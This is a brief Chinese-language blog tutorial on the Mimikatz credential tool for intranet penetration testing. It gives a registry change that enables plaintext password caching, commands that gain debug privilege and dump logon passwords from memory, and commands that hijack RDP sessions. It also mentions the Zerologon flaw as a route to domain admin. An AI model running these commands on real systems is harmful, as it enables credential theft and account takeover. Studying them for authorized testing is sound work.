介绍
Mimikatz是一款开源的Windows安全工具,它被作者定义为“用来学习C语言和做一些Windows安全性实验的工具”。Mimikatz工具在Windows操作系统中运行时,可以从内存中提取出操作系统的明文密码、哈希、PIN码和Kerberos票据等,并支持哈希传递(pass-the-hash)、票据传递(pass-the-ticket)和构建黄金票据等功能。Mimikatz工具发展到今天,在开源社区的助力下,已经成为在内网渗透测试中必不可少的工具之一。除了本机凭证相关功能之外,Mimikatz甚至还引入了RDP远程桌面服务劫持、Zerologon自动化获取域控权限等强大的功能。
下载地址
注意:当目的为win 10或者2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Mimikatz命令
提升权限命令
privilege::debug
抓取明文密码
privilege::debug
sekurlsa::logonpasswords
会话劫持
ts::sessions 查看当前目标主机存活的会话列表
privilege::debug
token::elevate
ts::remote /id:1 将远程桌面切换到会话ID为1的用户身份中
补充点:Zerologon漏洞(CVE-2020-1472),通过该漏洞,只需要访问域控服务器的445端口,就可以在不需要任何有效凭证的情况下获取域管理员的权限。Zerologon漏洞的成因是Netlogon协议认证的加密模块存在设计缺陷,导致可以在不具备有效凭证的情况下通过认证。
标签:教程,Windows,Zerologon,明文,privilege,Mimikatz,使用,debug From: https://www.cnblogs.com/kalixcn/p/18078964